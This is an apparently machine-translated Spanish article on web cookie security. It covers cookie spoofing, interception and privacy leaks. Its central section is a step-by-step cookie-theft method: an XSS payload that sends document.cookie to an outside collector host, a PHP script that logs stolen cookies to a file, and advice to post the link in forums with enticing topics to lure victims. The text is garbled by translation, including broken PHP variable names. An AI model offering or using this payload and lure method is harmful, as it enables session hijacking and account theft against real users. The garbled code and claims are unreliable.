El propósito de las cookies es traer conveniencia a los usuarios y agregar valor al sitio web, y generalmente no representa una seria amenaza de seguridad. Un archivo de cookies no se puede ejecutar como código, ni transmite virus, es propietario del usuario y solo puede ser leído por el servidor que lo creó. Además, los navegadores generalmente solo permiten almacenar 300 cookies, cada sitio almacena hasta 20 galletas y el tamaño de cada cookie está limitado a 4KB. Por lo tanto, las cookies no llenarán el disco duro y no se utilizarán como un método de ataque de "denegación de servicio".
Sin embargo, como sustituto de la identidad del usuario, su seguridad a veces determina la seguridad de todo el sistema, y la seguridad de las cookies no puede ignorarse.
(1) Las cookies falsifican la información de registro de las cookies, como la ID de cuenta del usuario, la contraseña, etc., y generalmente se cifran utilizando el método MD5 y se pasan en Internet. La información encriptada no puede entenderse incluso si es interceptada por algunas personas con motivos ocultos en Internet. Sin embargo, el problema ahora es que las personas que interceptan galletas no necesitan saber el significado de estas cuerdas. Mientras alguien envíe las cookies de otras personas al servidor y pueda aprobar la verificación, puede iniciar sesión en el sitio web como víctima. Este comportamiento se llama suplantación de cookies.
Los usuarios ilegales obtienen claves de cifrado correspondientes a través de cookies, accediendo así a toda la información personalizada de usuarios legítimos, incluido el correo electrónico del usuario e incluso la información de la cuenta, lo que causa daños graves a la información personal.
(2) Intercepción de cookies
Las cookies se transmiten entre el navegador y el servidor en texto plano, y son fácilmente interceptadas y explotadas por otros. Las cookies pueden ser leídas por cualquier persona que pueda interceptar comunicaciones web.
Después de que una cookie es interceptada por un usuario ilegal y luego se reproduce dentro de su período válido, el usuario ilegal disfrutará de los derechos e intereses del usuario legal. Por ejemplo, para la lectura en línea, los usuarios ilegales pueden disfrutar de la lectura en línea de revistas electrónicas sin pagar una tarifa.
Hay algunos métodos para interceptar cookies :
(1) Use métodos de programación para interceptar cookies. El siguiente es analizar su método, que se completa en dos pasos.
Paso 1: coloque el sitio web que necesita recopilar cookies, analizarlas y construir URL. Primero, abra el sitio web para recopilar cookies. Aquí, suponga que es http://www.xxx.net, inicie sesión en el sitio web e ingrese el nombre de usuario "<al>" (excluyendo citas), analice los datos y tome el paquete y obtenga el siguiente código:
http://www.xxx.net/txl/login/login.pl? nombre de usuario = <al> & passwd = & ok.x = 28 & ok.y = 6;
Reemplace "<Al>" con:
"<Script> Alert (document.cookie) </script>" intente nuevamente, y si la ejecución es exitosa, comience a construir la URL:
http://www.xxx.net/txl/login/login.pl? UserName = <Script> Window.open ("http://www.cbifamily.org/cbi.php?"%2BDocument.cookie)</script>&passwd=&ok.x=28&ok.y=6.
Entre ellos, http://www.cbifamily.org/cbi.php es un script en un host que el usuario puede controlar. Cabe señalar que "%2b" es la codificación de URL del símbolo "+", porque "+" se procesará como un espacio. Esta URL se puede publicar en el foro para inducir a otros a hacer clic.
Paso 2: Prepare un script PHP para recopilar cookies y colocarlo en un sitio web que el usuario pueda controlar. Cuando la persona desconocida hace clic en la URL construida, se puede ejecutar el código PHP. El contenido específico de este script es el siguiente:
La copia del código es la siguiente:
<? Php
$ info = getenv ("oomery_string");
if ($ info) {
$ fp = fopen ("info.txt", "a");
fwrite ($ fp ,! información. "/n");
fclose ($ fp);
}
Encabezado ("Ubicación: http: //www.xxx.net");
?>
Poner este código en la red puede recopilar las cookies de todos. Si un foro permite el código HTML o las etiquetas flash, puede usar estas tecnologías para recopilar cookies y ponerlas en el foro, luego darle a la publicación un tema atractivo y escribir contenido interesante, y recopilar rápidamente una gran cantidad de cookies. En el foro, las contraseñas de muchas personas fueron robadas por este método.
(2) Use el código oculto del código de Flash para interceptar cookies. Hay una función getUrl () en flash. Flash puede usar esta función para abrir automáticamente una página web especificada, que puede llevar al usuario a un sitio web que contiene código malicioso. Por ejemplo, cuando un usuario disfruta de Flash Animation en una computadora, el código en el marco de animación puede haberse conectado silenciosamente a Internet y abrir una página muy pequeña que contiene un código especial que puede recopilar cookies y hacer otras cosas dañinas. El sitio web no puede prohibir esta acción de Flash porque es una función interna del archivo Flash.
(3) privacidad de la red de fuga de cookies
La razón principal por la que las cookies conducen a fugas de privacidad en línea es :! impulsado por intereses comerciales. Con el aumento del comercio electrónico y el surgimiento de grandes oportunidades comerciales en Internet, algunos sitios web e instituciones abusan de las cookies y utilizan la tecnología de los motores de búsqueda, la tecnología de minería de datos e incluso la tecnología de engaño en línea para recopilar la información personal de otras personas sin el permiso de los visitantes, a fin de lograr fines de ganancias, como la construcción de bases de datos de usuarios y enviar anuncios de los usuarios, lo que provoca la fuga de la privacidad personal de los usuarios. "La apertura de la transmisión de información de cookies. Los archivos de cookies tienen procesos de entrega especiales y características de texto. Los archivos de cookies que no están encriptados de forma segura se transmiten entre el servidor y el cliente, lo que puede conducir fácilmente a la fuga de información personal.
Los anteriores son todo comprensión personal de la seguridad de las cookies. Si hay alguna omisión, corregirlas.